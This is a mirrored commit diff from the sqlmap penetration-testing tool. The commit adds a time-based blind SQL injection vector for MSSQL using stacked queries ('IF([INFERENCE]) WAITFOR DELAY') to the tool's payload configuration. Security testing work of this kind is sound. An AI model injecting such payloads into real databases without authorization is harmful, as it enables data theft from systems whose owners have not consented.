mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 12:41:30 +00:00
Added possible stacked queries time-based blind vector for MSSQL
This commit is contained in:
@@ -1310,7 +1310,7 @@ Formats:
|
|||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>0</clause>
|
<clause>0</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector></vector>
|
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
|
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
|
||||||
<comment>--</comment>
|
<comment>--</comment>
|
||||||
|
|||||||
Reference in New Issue
Block a user